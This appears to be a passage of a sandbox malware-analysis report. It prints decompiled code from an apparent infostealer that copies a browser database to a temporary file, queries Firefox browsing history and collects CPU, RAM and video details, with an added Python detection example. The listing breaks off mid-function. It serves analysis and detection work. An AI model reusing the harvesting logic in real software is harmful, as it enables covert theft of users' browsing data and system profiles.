                            				intOrPtr* _t164;
                            				void* _t166;
                            				void* _t178;
                            				intOrPtr _t198;
                            				intOrPtr _t200;
                            				intOrPtr _t213;
                            				intOrPtr _t217;
                            				intOrPtr _t218;
                            				void* _t219;
                            				void* _t220;
                            
                            				_t215 = __esi;
                            				_t177 = __ebx;
                            				_t217 = _t218;
                            				_t178 = 0xb;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t178 = _t178 - 1;
                            					_t223 = _t178;
                            				} while (_t178 != 0);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				_push(_t217);
                            				_push(0x412809);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t218;
                            				E00403BDC( &_v28);
                            				_push(_t217);
                            				_push(0x41277f);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t218;
                            				E0040709C(GetTickCount(), __ebx,  &_v60, __esi, _t223);
                            				_push(_v60);
                            				E00406FDC( &_v64, __ebx, __edi, __esi, _t223);
                            				_push(_v64);
                            				_push(L".tmp");
                            				E00403E78();
                            				E004078D8(_v8, _t177,  &_v40, _t223);
                            				E004062FC(L"%TEMP%",  &_v72, _t223);
                            				_push(_v72);
                            				_push(0x412840);
                            				_push(_v32);
                            				E00403E78();
                            				E004078D8(_v68, _t177,  &_v44, _t223);
                            				_t86 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t86, 0xffffffff);
                            				E0040377C( &_v76, _v44);
                            				E00404B58(_v76, _t177, _t178,  &_v36, _t215, _t223);
                            				E00403D88( &_v80, _v36);
                            				if(E0040776C(_v80, _t177, _t178) != 0) {
                            					_t101 =  *0x41b140; // 0x41ca20
                            					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
                            					_t219 = _t218 + 8;
                            					__eflags = _t103;
                            					if(_t103 == 0) {
                            						_t138 =  *0x41b2d4; // 0x41ca28
                            						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME(moz_historyvisits.visit_date/1000000, \"unixepoch\", \"localtime\"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
                            						_t220 = _t219 + 0x14;
                            						__eflags = _t140;
                            						if(_t140 == 0) {
                            							while(1) {
                            								_t142 =  *0x41b384; // 0x41ca2c
                            								_t144 =  *((intOrPtr*)( *_t142))(_v20);
                            								__eflags = _t144 - 0x64;
                            								if(_t144 != 0x64) {
                            									goto L9;
                            								}
                            								E004034E4( &_v48);
                            								E004034E4( &_v52);
                            								E004034E4( &_v56);
                            								_t152 =  *0x41b1dc; // 0x41ca30
                            								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
                            								_t158 =  *0x41b1dc; // 0x41ca30
                            								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
                            								_t164 =  *0x41b1dc; // 0x41ca30
                            								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
                            								_t220 = _t220 + 0x18;
                            								E004036DC( &_v56, _t166);
                            								_push(_v28);
                            								_push(0x412948);
                            								E00403D88( &_v84, _v48);
                            								_push(_v84);
                            								_push(0x412950);
                            								E00403D88( &_v88, _v52);
                            								_push(_v88);
                            								_push(0x41295c);
                            								E00403D88( &_v92, _v56);
                            								_push(_v92);
                            								_push(L"\r\n\r\n");
                            								E00403E78();
                            							}
                            						}
                            					}
                            					L9:
                            					_t105 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t105))(_v20);
                            					_t109 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t109))(_v16);
                            					_pop(_t198);
                            					 *[fs:eax] = _t198;
                            					E00403C18(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t213);
                            					 *[fs:eax] = _t213;
                            				}
                            				_pop(_t200);
                            				 *[fs:eax] = _t200;
                            				_push(E00412810);
                            				E00403BF4( &_v92, 4);
                            				E004034E4( &_v76);
                            				E00403BF4( &_v72, 4);
                            				E00403508( &_v56, 3);
                            				E00403BF4( &_v44, 2);
                            				E004034E4( &_v36);
                            				E00403BF4( &_v32, 2);
                            				return E00403BDC( &_v8);
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 00412580
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
                            • DeleteFileW.KERNEL32(00000000), ref: 0041279D
                            Strings
                            • %TEMP%, xrefs: 004125BB
                            • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412666
                            • .tmp, xrefs: 0041259B
                            • , xrefs: 00412730
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: File$CopyCountDeleteTick
                            • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
                            • API String ID: 2381671008-462058183
                            • Opcode ID: 74af028e87f69800883d2846e1069ba7485055c1e626ef979e211516bbf6465a
                            • Instruction ID: 96711d942fa6cd82f2097d7fbc3cef73731e9345f18fca2529b5113db019f3e4
                            • Opcode Fuzzy Hash: 74af028e87f69800883d2846e1069ba7485055c1e626ef979e211516bbf6465a
                            • Instruction Fuzzy Hash: 70810A71A00109AFDB00EB95DD82EDEBBB8EF48305F504536F414F72A1DB78AE568B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E00415E3C(intOrPtr* __eax, void* __ebx, void* __esi) {
                            				struct _SYSTEM_INFO _v40;
                            				intOrPtr _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				char _v60;
                            				char _v64;
                            				char _v68;
                            				intOrPtr _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				signed int _t38;
                            				signed int _t39;
                            				signed int _t92;
                            				void* _t93;
                            				void* _t94;
                            				intOrPtr _t113;
                            				void* _t117;
                            				intOrPtr _t120;
                            				intOrPtr _t121;
                            
                            				_t118 = __esi;
                            				_t38 = __eax +  *__eax;
                            				 *_t38 =  *_t38 + _t38;
                            				_t39 = _t38 | 0x5500000a;
                            				_t120 = _t121;
                            				_t93 = 0xb;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t93 = _t93 - 1;
                            					_t124 = _t93;
                            				} while (_t93 != 0);
                            				_t92 = _t39;
                            				_push(_t120);
                            				_push(0x415fd0);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t121;
                            				GetSystemInfo( &_v40);
                            				E00403D88( &_v48,  *_t92);
                            				_push(_v48);
                            				_push(L"CPU Model: ");
                            				_push(0);
                            				_push( &_v52);
                            				E004069A8("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t92,  &_v60, _t117, __esi);
                            				E00403D88( &_v56, _v60);
                            				_push(_v56);
                            				E004069A8("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t92,  &_v68, _t117, __esi);
                            				E00403D88( &_v64, _v68);
                            				_pop(_t94);
                            				E004075C0(0x80000002, _t92, _t94, _v64);
                            				_push(_v52);
                            				_push(0x416070);
                            				E00403E78();
                            				E0040377C(_t92, _v44);
                            				E004037DC( &_v80, "CPU Count: ",  *_t92);
                            				E00403D88( &_v76, _v80);
                            				_push(_v76);
                            				E0040709C(_v40.dwNumberOfProcessors, _t92,  &_v84, __esi, _t124);
                            				_push(_v84);
                            				_push(0x416070);
                            				E00403E78();
                            				E0040377C(_t92, _v72);
                            				_push( *_t92);
                            				_push("GetRAM: ");
                            				E00415CA0( &_v88, _t92, _t118, _t124);
                            				_push(_v88);
                            				_push(0x4160a8);
                            				E00403850();
                            				_push( *_t92);
                            				_push("Video Info\r\n");
                            				E00415D60( &_v92, _t92, _t117, _t118);
                            				_push(_v92);
                            				E00403850();
                            				_t113 = 0x4160a8;
                            				 *[fs:eax] = _t113;
                            				_push(E00415FD7);
                            				E00403508( &_v92, 2);
                            				E00403BDC( &_v84);
                            				E004034E4( &_v80);
                            				E00403BF4( &_v76, 2);
                            				E004034E4( &_v68);
                            				E00403BDC( &_v64);
                            				E004034E4( &_v60);
                            				return E00403BF4( &_v56, 4);
                            			}

                            APIs
                            • GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeString$InfoSystem
                            • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                            • API String ID: 4070941872-1038824218
                            • Opcode ID: e3329636347596496c804121c37975c5fee0a9f2c2cf4a950dd5601219652f8f
                            • Instruction ID: 841de3dabe4d1ada80fc57b7235bfd5090272e00ed4efe0c369eb699e4c4d56e
                            • Opcode Fuzzy Hash: e3329636347596496c804121c37975c5fee0a9f2c2cf4a950dd5601219652f8f
                            • Instruction Fuzzy Hash: 3941E274A00108ABCB01EFD1D842FCDBBB9EF48305F51813BF504B7296D679EA468B59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E00415E44(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                            				struct _SYSTEM_INFO _v40;
                            				intOrPtr _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				char _v60;
                            				char _v64;
                            				char _v68;
                            				intOrPtr _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				intOrPtr* _t90;
                            				void* _t91;
                            				void* _t92;
                            				intOrPtr _t111;
                            				intOrPtr _t118;
                            				intOrPtr _t119;
                            
                            				_t116 = __esi;
                            				_t115 = __edi;
                            				_t118 = _t119;
                            				_t91 = 0xb;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t91 = _t91 - 1;
                            					_t120 = _t91;
                            				} while (_t91 != 0);
                            				_t90 = __eax;
                            				_push(_t118);
                            				_push(0x415fd0);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t119;
                            				GetSystemInfo( &_v40);
                            				E00403D88( &_v48,  *_t90);
                            				_push(_v48);
                            				_push(L"CPU Model: ");
                            				_push(0);
                            				_push( &_v52);
                            				E004069A8("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t90,  &_v60, __edi, __esi);
                            				E00403D88( &_v56, _v60);
                            				_push(_v56);
                            				E004069A8("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t90,  &_v68, __edi, __esi);
                            				E00403D88( &_v64, _v68);
                            				_pop(_t92);
                            				E004075C0(0x80000002, _t90, _t92, _v64);
                            				_push(_v52);
                            				_push(0x416070);
                            				E00403E78();
                            				E0040377C(_t90, _v44);
                            				E004037DC( &_v80, "CPU Count: ",  *_t90);
                            				E00403D88( &_v76, _v80);
                            				_push(_v76);
                            				E0040709C(_v40.dwNumberOfProcessors, _t90,  &_v84, _t116, _t120);
                            				_push(_v84);
                            				_push(0x416070);
                            				E00403E78();
                            				E0040377C(_t90, _v72);
                            				_push( *_t90);
                            				_push("GetRAM: ");
                            				E00415CA0( &_v88, _t90, _t116, _t120);
                            				_push(_v88);
                            				_push(0x4160a8);
                            				E00403850();
                            				_push( *_t90);
                            				_push("Video Info\r\n");
                            				E00415D60( &_v92, _t90, _t115, _t116);
                            				_push(_v92);
                            				E00403850();
                            				_t111 = 0x4160a8;
                            				 *[fs:eax] = _t111;
                            				_push(E00415FD7);
                            				E00403508( &_v92, 2);
                            				E00403BDC( &_v84);
                            				E004034E4( &_v80);
                            				E00403BF4( &_v76, 2);
                            				E004034E4( &_v68);
                            				E00403BDC( &_v64);
                            				E004034E4( &_v60);
                            				return E00403BF4( &_v56, 4);
                            			}

                            APIs
                            • GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeString$InfoSystem
                            • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                            • API String ID: 4070941872-1038824218
                            • Opcode ID: a611c49ac069c5e380e44cd9a16c7ef5b0defb37ecc81f47e8648592268aafc1
                            • Instruction ID: 6ee615b5186dd69ea9a83c9e9698d3011ce36d6a126617133cf52e038528ef4b
                            • Opcode Fuzzy Hash: a611c49ac069c5e380e44cd9a16c7ef5b0defb37ecc81f47e8648592268aafc1
                            • Instruction Fuzzy Hash: 9941F174A00108ABCB01EFD1D842FCDBBB9AF48305F51413BF504B7296D678EA468B59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E00403368(void* __ecx) {
                            				long _v4;
                            				int _t3;
                            
                            				if( *0x41c034 == 0) {
                            					if( *0x41b024 == 0) {
                            						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                            					}
                            					return _t3;
                            				} else {
                            					if( *0x41c208 == 0xd7b2 &&  *0x41c210 > 0) {
                            						 *0x41c220();
                            					}
                            					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                            					return WriteFile(GetStdHandle(0xfffffff5), E004033F0, 2,  &_v4, 0);
                            				}
                            			}

                            APIs
                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
                            • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A212,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436), ref: 004033BC
                            • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A212,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436), ref: 004033C2
                            • MessageBoxA.USER32 ref: 004033E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileHandleWrite$Message
                            • String ID: Error$Runtime error at 00000000
                            • API String ID: 1570097196-2970929446
                            • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                            • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                            • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                            • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 42%
                            			E004112D0(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				WCHAR* _t83;
                            				intOrPtr* _t98;
                            				intOrPtr _t100;
                            				intOrPtr* _t102;
                            				intOrPtr* _t106;
                            				intOrPtr* _t134;
                            				intOrPtr* _t138;
                            				intOrPtr _t140;
                            				intOrPtr* _t142;
                            				void* _t144;
                            				intOrPtr* _t146;
                            				intOrPtr* _t150;
                            				void* _t152;
                            				intOrPtr* _t157;
                            				intOrPtr* _t163;
                            				intOrPtr* _t169;
                            				void* _t171;
                            				intOrPtr* _t175;
                            				void* _t178;
                            				intOrPtr _t199;
                            				intOrPtr _t201;
                            				void* _t206;
                            				intOrPtr _t212;
                            				intOrPtr _t216;
                            				intOrPtr _t217;
                            				void* _t218;
                            				void* _t219;
                            
                            				_t214 = __esi;
                            				_t177 = __ebx;
                            				_t216 = _t217;
                            				_t178 = 0xa;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t178 = _t178 - 1;
                            					_t224 = _t178;
                            				} while (_t178 != 0);
                            				_push(_t178);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				_push(_t216);
                            				_push(0x4115ab);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t217;
                            				E00403BDC( &_v28);
                            				_push(_t216);
                            				_push(0x411526);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t217;
                            				E0040709C(GetTickCount(), __ebx,  &_v52, __esi, _t224);
                            				_push(_v52);
                            				E00406FDC( &_v56, __ebx, __edi, __esi, _t224);
                            				_push(_v56);
                            				_push(L".tmp");
                            				E00403E78();
                            				E004078D8(_v8, _t177,  &_v40, _t224);
                            				E004062FC(L"%TEMP%",  &_v64, _t224);
                            				_push(_v64);
                            				_push(0x4115e4);
                            				_push(_v32);
                            				E00403E78();
                            				E004078D8(_v60, _t177,  &_v44, _t224);
                            				_t83 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t83, 0xffffffff);
                            				E0040377C( &_v68, _v44);
                            				E00404B58(_v68, _t177, _t178,  &_v36, _t214, _t224);
                            				E00403D88( &_v72, _v36);
                            				if(E0040776C(_v72, _t177, _t178) != 0) {
                            					_t98 =  *0x41b140; // 0x41ca20
                            					_t100 =  *((intOrPtr*)( *_t98))(E00403990(_v36),  &_v16);
                            					_t218 = _t217 + 8;
                            					__eflags = _t100;
                            					if(_t100 == 0) {
                            						_t134 =  *0x41b390; // 0x41c934
                            						_t138 =  *0x41b2d4; // 0x41ca28
                            						_t140 =  *((intOrPtr*)( *_t138))(_v16, E00403990( *_t134), 0xffffffff,  &_v20,  &_v24);
                            						_t219 = _t218 + 0x14;
                            						__eflags = _t140;
                            						if(_t140 == 0) {
                            							while(1) {
                            								_t142 =  *0x41b384; // 0x41ca2c
                            								_t144 =  *((intOrPtr*)( *_t142))(_v20);
                            								__eflags = _t144 - 0x64;
                            								if(_t144 != 0x64) {
                            									goto L9;
                            								}
                            								_t146 =  *0x41b414; // 0x41ca34
                            								_t150 =  *0x41b1dc; // 0x41ca30
                            								_t152 =  *((intOrPtr*)( *_t150))(_v20, 3,  *((intOrPtr*)( *_t146))(_v20, 3));
                            								_pop(_t206);
                            								E0040A610(_t152,  &_v48, _t206);
                            								E00403D88( &_v76, _v48);
                            								_t157 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v80,  *((intOrPtr*)( *_t157))(_v20, 0, 0x4115ec, _v76, _v28));
                            								_t163 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v84,  *((intOrPtr*)( *_t163))(_v20, 1, 0x4115ec, _v80));
                            								_t169 =  *0x41b1dc; // 0x41ca30
                            								_t171 =  *((intOrPtr*)( *_t169))(_v20, 2, 0x4115f8, _v84);
                            								_t219 = _t219 + 0x28;
                            								E00403CF4( &_v88, _t171);
                            								_push(_v88);
                            								_push(L"\r\n\r\n");
                            								E00403E78();
                            								_t175 =  *0x41b1cc; // 0x41b0b4
                            								 *_t175 =  *_t175 + 1;
                            								__eflags =  *_t175;
                            							}
                            						}
                            					}
                            					L9:
                            					_t102 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t102))(_v20);
                            					_t106 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t106))(_v16);
                            					_pop(_t199);
                            					 *[fs:eax] = _t199;
                            					E00403C18(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t212);
                            					 *[fs:eax] = _t212;
                            				}
                            				_pop(_t201);
                            				 *[fs:eax] = _t201;
                            				_push(E004115B2);
                            				E00403BF4( &_v88, 5);
                            				E004034E4( &_v68);
                            				E00403BF4( &_v64, 4);
                            				E004034E4( &_v48);
                            				E00403BF4( &_v44, 2);
                            				E004034E4( &_v36);
                            				E00403BF4( &_v32, 2);
                            				return E00403BDC( &_v8);
                            			}

                            Address range of the listing above: 0x004112d0 to 0x004115aa (per-line address column omitted)

                            APIs
                            • GetTickCount.KERNEL32 ref: 00411315
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                            • DeleteFileW.KERNEL32(00000000), ref: 00411544
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: File$CopyCountDeleteTick
                            • String ID: $%TEMP%$.tmp
                            • API String ID: 2381671008-2792595090
                            • Opcode ID: 999a6dcd94329e66fb0c1ca6b512f09a510efeadcb57a00f6471d8c614f23e15
                            • Instruction ID: 2907a0a36d16f86ef06436b94052184e29eddf1806116983537aed2fe47c33e4
                            • Opcode Fuzzy Hash: 999a6dcd94329e66fb0c1ca6b512f09a510efeadcb57a00f6471d8c614f23e15
                            • Instruction Fuzzy Hash: 8C81F871A00109AFDB00EF95DC82EDEBBB9EF49305F508436F514F72A1DB38AA458B59
                            Uniqueness

                            Uniqueness Score: -1.00%

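                            The listing above (and E00410D88 further down, which repeats it) shows one sequence: GetTickCount() rendered as a string with ".tmp" appended under %TEMP%, CopyFileW of a caller-supplied file to that path, a loop of calls through a resolved function table that continues while one of them returns 0x64, concatenation of the rows with "\r\n\r\n", and finally DeleteFileW of the copy. Note that the report's APIs block only lists the statically imported calls (GetTickCount, CopyFileW, DeleteFileW); the table calls inside the loop are not attributed. The check below is added here as an example for detection engineers; it is not part of the Joe Sandbox report or of the sample. It scans process/file telemetry for a short-lived numeric .tmp file in the user temp directory. The event tuple format, the temp directory, the source path profile.db, the process IDs and the assumption that the tick count is rendered in decimal are all constructed for the example.

```python
import re
from collections import defaultdict

# User temp directory used by the constructed events below (lower-cased for
# matching). A production detector resolves %TEMP% per user session instead.
TEMP_DIR = r"c:\users\u\appdata\local\temp"

# GetTickCount() returns a 32-bit value; the listing converts it to a string
# and appends ".tmp". Decimal rendering is an assumption of this example, so
# the name is matched as 1 to 10 digits followed by ".tmp".
TICK_TMP = re.compile(r"^\d{1,10}\.tmp$")

# Create-to-delete dwell time (seconds) below which the copy is "short-lived".
WINDOW_SECONDS = 5.0

# Constructed telemetry: (timestamp_seconds, pid, operation, path).
# pid 4120 reproduces the listing's sequence; the others are benign decoys.
SAMPLE_EVENTS = [
    (100.0, 4120, "FileRead",   r"C:\Users\u\AppData\Local\ExampleApp\profile.db"),
    (100.1, 4120, "FileCreate", r"C:\Users\u\AppData\Local\Temp\3822915.tmp"),
    (100.2, 4120, "FileRead",   r"C:\Users\u\AppData\Local\Temp\3822915.tmp"),
    (100.3, 4120, "FileDelete", r"C:\Users\u\AppData\Local\Temp\3822915.tmp"),
    # installer: the .tmp name is not a tick count
    (200.0, 5000, "FileCreate", r"C:\Users\u\AppData\Local\Temp\setup_log.tmp"),
    (260.0, 5000, "FileDelete", r"C:\Users\u\AppData\Local\Temp\setup_log.tmp"),
    # numeric .tmp that lives far longer than the window
    (300.0, 6000, "FileCreate", r"C:\Users\u\AppData\Local\Temp\12345.tmp"),
    (400.0, 6000, "FileDelete", r"C:\Users\u\AppData\Local\Temp\12345.tmp"),
    # short-lived numeric .tmp without a visible source read (lower confidence)
    (500.0, 7000, "FileCreate", r"C:\Users\u\AppData\Local\Temp\777.tmp"),
    (501.0, 7000, "FileDelete", r"C:\Users\u\AppData\Local\Temp\777.tmp"),
]


def is_tick_tmp(path):
    """True for <digits>.tmp directly under the user temp directory."""
    directory, _, name = path.lower().rpartition("\\")
    return directory == TEMP_DIR and TICK_TMP.match(name) is not None


def detect_copy_read_delete(events, window=WINDOW_SECONDS):
    """Return one alert per numeric .tmp that a process creates and deletes
    within `window` seconds. Each alert also lists the non-temp files the
    same process read around the copy, which is where the copied original
    shows up when the telemetry records reads at all."""
    created = {}                  # (pid, path) -> creation time
    reads = defaultdict(list)     # pid -> [(time, path)] for non-temp reads
    alerts = []
    for t, pid, op, path in sorted(events):
        key = (pid, path.lower())
        if op == "FileRead" and not is_tick_tmp(path):
            reads[pid].append((t, path))
        elif op == "FileCreate" and is_tick_tmp(path):
            created[key] = t
        elif op == "FileDelete" and key in created:
            t_create = created.pop(key)
            if t - t_create <= window:
                sources = [p for tr, p in reads[pid]
                           if t_create - window <= tr <= t]
                alerts.append({"pid": pid, "temp_path": path,
                               "dwell": round(t - t_create, 3),
                               "sources": sources})
    return alerts


if __name__ == "__main__":
    for alert in detect_copy_read_delete(SAMPLE_EVENTS):
        print(alert)
```

                            With Sysmon the create and delete sides map to Event ID 11 (FileCreate) and 23/26 (FileDelete), which carry no read events, so the `sources` enrichment stays empty there and the alert rests on the numeric name plus the short dwell time alone; tune WINDOW_SECONDS against your own baseline of installer and updater behaviour before deploying.
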
                            C-Code - Quality: 49%
                            			E0040BEBC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                            				_Unknown_base(*)()* _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v52;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				intOrPtr* _t61;
                            				CHAR* _t63;
                            				intOrPtr* _t64;
                            				intOrPtr* _t81;
                            				intOrPtr* _t92;
                            				_Unknown_base(*)()* _t95;
                            				intOrPtr* _t96;
                            				intOrPtr* _t100;
                            				intOrPtr* _t137;
                            				struct HINSTANCE__* _t138;
                            				signed int _t139;
                            				intOrPtr* _t145;
                            				intOrPtr* _t147;
                            				intOrPtr _t149;
                            				intOrPtr _t152;
                            				intOrPtr _t153;
                            				intOrPtr* _t163;
                            				intOrPtr* _t166;
                            				void* _t168;
                            				void* _t169;
                            				signed int _t174;
                            				void* _t175;
                            				void* _t177;
                            
                            				_v76 = 0;
                            				_v72 = 0;
                            				_v20 = 0;
                            				_v24 = 0;
                            				_v28 = 0;
                            				_v32 = 0;
                            				_v36 = 0;
                            				 *[fs:eax] = _t177 + 0xffffffb8;
                            				_t61 =  *0x41b40c; // 0x41c9f4
                            				_t63 = E00403990( *_t61);
                            				_t64 =  *0x41b460; // 0x41c9f0
                            				_t137 = GetProcAddress(LoadLibraryA(E00403990( *_t64)), _t63);
                            				_t145 =  *0x41b41c; // 0x41c9f8
                            				E00403D88( &_v72,  *_t145);
                            				 *_t137(E00403D98(_v72),  &_v52,  *[fs:eax], 0x40c0de, _t177, __edi, __esi, __ebx, _t175);
                            				_t147 =  *0x41b430; // 0x41c9fc
                            				E00403D88( &_v76,  *_t147);
                            				 *_t137(E00403D98(_v76),  &_v68);
                            				_t81 =  *0x41b3a8; // 0x41ca00
                            				_t138 = LoadLibraryA(E00403990( *_t81));
                            				if(_t138 != 0) {
                            					_t92 =  *0x41b370; // 0x41ca04
                            					_t95 = GetProcAddress(_t138, E00403990( *_t92));
                            					_t96 =  *0x41b1a8; // 0x41ca08
                            					_t166 = GetProcAddress(_t138, E00403990( *_t96));
                            					_t100 =  *0x41b360; // 0x41ca0c
                            					_v8 = GetProcAddress(_t138, E00403990( *_t100));
                            					_v12 = 0;
                            					_push( &_v16);
                            					_push(0);
                            					_push( &_v52);
                            					if( *_t95() == 0) {
                            						_push( &_v20);
                            						_push( &_v12);
                            						_push(0x200);
                            						_push(_v16);
                            						if( *_t166() == 0) {
                            							_t168 = _v12 - 1;
                            							if(_t168 >= 0) {
                            								_t169 = _t168 + 1;
                            								_t139 = 0;
                            								do {
                            									_t153 =  *0x40be90; // 0x40be94
                            									E00404810( &_v24, _t153);
                            									_push( &_v24);
                            									_push(0);
                            									_push(0);
                            									_push(0);
                            									_t174 = (_t139 << 3) - _t139;
                            									_push( *((intOrPtr*)(_v20 + 0x18 + _t174 * 8)));
